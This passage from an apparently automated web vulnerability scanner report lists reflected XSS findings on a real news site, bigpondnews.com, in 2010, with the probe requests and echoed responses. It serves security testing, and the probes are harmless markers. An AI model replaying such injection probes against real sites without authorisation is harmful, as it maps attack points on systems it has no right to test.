GET /articles/TopStories794aa"%3bf430d19dc1f/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:40 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=12E728B777D3FF86C4A17B68E76D1002; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:34:40 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<script type="text/javascript">
MediaSmart.Utilities.initialise({
area: "TOPSTORIES794AA";F430D19DC1F"
});
</script>
...[SNIP]...

2.431. http://bigpondnews.com/articles/TopStories/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6362d'%3bbbbc407be9d was submitted in the REST URL parameter 2. This input was echoed as 6362d';bbbc407be9d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/TopStories6362d'%3bbbbc407be9d/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:46 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=EE2D6EF8D430F292E55CA84A2143C74D; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:34:46 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<!--
s.prop1='BP';
s.prop2='News';
s.prop3='News';
s.channel='TopStories6362d';bbbc407be9d';
s.prop4='Home';
s.prop5='';
s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + '-' + s.prop4;
s.hier1= s.prop1 + '|' + s.prop2 + '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
s.server=documen
...[SNIP]...

2.432. http://bigpondnews.com/articles/TopStories/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 221a9"%3b5767cbd81c9 was submitted in the REST URL parameter 2. This input was echoed as 221a9";5767cbd81c9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/TopStories221a9"%3b5767cbd81c9/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:23 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=E60287088AE72C92D7CE89161789823A; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:34:23 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<script type="text/javascript">
MediaSmart.Utilities.initialise({
area: "TOPSTORIES221A9";5767CBD81C9"
});
</script>
...[SNIP]...

2.433. http://bigpondnews.com/articles/TopStories/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f5e2"><a>02af3db3003 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /articles/TopStories6f5e2"><a>02af3db3003/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:28:57 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=D525844671DF567771F1AB0EED0C9233; Path=/
Content-Language: en
Content-Length: 55110
Expires: Tue, 23 Nov 2010 03:33:57 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<a class="more-link" href="/latestarticles/TopStories6f5e2"><a>02af3db3003/1">
...[SNIP]...

2.434. http://bigpondnews.com/articles/TopStories/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ea88'%3b660c157e775 was submitted in the REST URL parameter 2. This input was echoed as 7ea88';660c157e775 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/TopStories7ea88'%3b660c157e775/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:29 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=14DC333C04DAE99BEAEA3D8FC1A6296F; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:34:29 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<!--
s.prop1='BP';
s.prop2='News';
s.prop3='News';
s.channel='TopStories7ea88';660c157e775';
s.prop4='Home';
s.prop5='';
s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + '-' + s.prop4;
s.hier1= s.prop1 + '|' + s.prop2 + '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
s.server=documen
...[SNIP]...

2.435. http://bigpondnews.com/articles/TopStories/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fd3c"><a>33929a8bf53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /articles/TopStories3fd3c"><a>33929a8bf53/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:00 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=7E983353C7155553FE53450328F7263A; Path=/
Content-Language: en
Content-Length: 55110
Expires: Tue, 23 Nov 2010 03:34:00 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<a class="more-link" href="/latestarticles/TopStories3fd3c"><a>33929a8bf53/1">
...[SNIP]...

2.436. http://bigpondnews.com/articles/TopStories/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f5a5'%3b0b401fec75a was submitted in the REST URL parameter 2. This input was echoed as 1f5a5';0b401fec75a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/TopStories1f5a5'%3b0b401fec75a/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:32 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=090E04503B536208B9ACBA41DD2F14EC; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:34:32 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<!--
s.prop1='BP';
s.prop2='News';
s.prop3='News';
s.channel='TopStories1f5a5';0b401fec75a';
s.prop4='Home';
s.prop5='';
s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + '-' + s.prop4;
s.hier1= s.prop1 + '|' + s.prop2 + '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
s.server=documen
...[SNIP]...

2.437. http://bigpondnews.com/articles/TopStories/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 303b0"%3b347ead3c2f was submitted in the REST URL parameter 2. This input was echoed as 303b0";347ead3c2f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/TopStories303b0"%3b347ead3c2f/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:26 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=EA6BE5AFBE75962C70515806E54C4A26; Path=/
Content-Language: en
Content-Length: 55094
Expires: Tue, 23 Nov 2010 03:34:26 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<script type="text/javascript">
MediaSmart.Utilities.initialise({
area: "TOPSTORIES303B0";347EAD3C2F"
});
</script>
...[SNIP]...

2.438. http://bigpondnews.com/articles/TopStories/2010/11/23/Robber_shot_dead_outside_hotel_542635.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Robber_shot_dead_outside_hotel_542635.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f76aa"%3b13eb338e3e9 was submitted in the REST URL parameter 2. This input was echoed as f76aa";13eb338e3e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/TopStoriesf76aa"%3b13eb338e3e9/2010/11/23/Robber_shot_dead_outside_hotel_542635.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:36 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=0D02AE5E4458A4914B6A6C96B6852E48; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:34:36 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<script type="text/javascript">
MediaSmart.Utilities.initialise({
area: "TOPSTORIESF76AA";13EB338E3E9"
});
</script>
...[SNIP]...

2.439. http://bigpondnews.com/articles/TopStories/2010/11/23/Robber_shot_dead_outside_hotel_542635.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Robber_shot_dead_outside_hotel_542635.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf690"><a>2e3872849c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /articles/TopStoriescf690"><a>2e3872849c8/2010/11/23/Robber_shot_dead_outside_hotel_542635.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:09 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=DB6FB417CE04803C4F4D87860BE19566; Path=/
Content-Language: en
Content-Length: 55110
Expires: Tue, 23 Nov 2010 03:34:09 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<a class="more-link" href="/latestarticles/TopStoriescf690"><a>2e3872849c8/1">
...[SNIP]...

2.440. http://bigpondnews.com/articles/TopStories/2010/11/23/Robber_shot_dead_outside_hotel_542635.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Robber_shot_dead_outside_hotel_542635.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e052f'%3b22e4d1e7c98 was submitted in the REST URL parameter 2. This input was echoed as e052f';22e4d1e7c98 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/TopStoriese052f'%3b22e4d1e7c98/2010/11/23/Robber_shot_dead_outside_hotel_542635.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:42 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=74D3D82AFE2BBC2D5BE07ECC82904208; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:34:42 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<!--
s.prop1='BP';
s.prop2='News';
s.prop3='News';
s.channel='TopStoriese052f';22e4d1e7c98';
s.prop4='Home';
s.prop5='';
s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + '-' + s.prop4;
s.hier1= s.prop1 + '|' + s.prop2 + '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
s.server=documen
...[SNIP]...

2.441. http://bigpondnews.com/articles/TopStories/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d19ae'%3b379348177ad was submitted in the REST URL parameter 2. This input was echoed as d19ae';379348177ad in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/TopStoriesd19ae'%3b379348177ad/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:37 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=49E13177096B14760D5B1945615096AB; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:34:37 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<!--
s.prop1='BP';
s.prop2='News';
s.prop3='News';
s.channel='TopStoriesd19ae';379348177ad';
s.prop4='Home';
s.prop5='';
s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + '-' + s.prop4;
s.hier1= s.prop1 + '|' + s.prop2 + '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
s.server=documen
...[SNIP]...

2.442. http://bigpondnews.com/articles/TopStories/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65fc7"><a>4405adf754f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /articles/TopStories65fc7"><a>4405adf754f/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:06 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=C45921B75EFA678B23E38A9CF0D53E6F; Path=/
Content-Language: en
Content-Length: 55110
Expires: Tue, 23 Nov 2010 03:34:06 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<a class="more-link" href="/latestarticles/TopStories65fc7"><a>4405adf754f/1">
...[SNIP]...

2.443. http://bigpondnews.com/articles/TopStories/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/TopStories/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e64e"%3bf2afee16327 was submitted in the REST URL parameter 2. This input was echoed as 8e64e";f2afee16327 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/TopStories8e64e"%3bf2afee16327/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:29:32 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=909977F57BF254EEB7AF02A5B296CE0B; Path=/
Content-Language: en
Content-Length: 55098
Expires: Tue, 23 Nov 2010 03:34:32 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<script type="text/javascript">
MediaSmart.Utilities.initialise({
area: "TOPSTORIES8E64E";F2AFEE16327"
});
</script>
...[SNIP]...

2.444. http://bigpondnews.com/articles/World/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/World/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51210"%3b0a4ecc94d38 was submitted in the REST URL parameter 2. This input was echoed as 51210";0a4ecc94d38 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/World51210"%3b0a4ecc94d38/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:30:35 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=72657DA3E5F961A271FA1F0127ED9820; Path=/
Content-Language: en
Content-Length: 55078
Expires: Tue, 23 Nov 2010 03:35:35 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

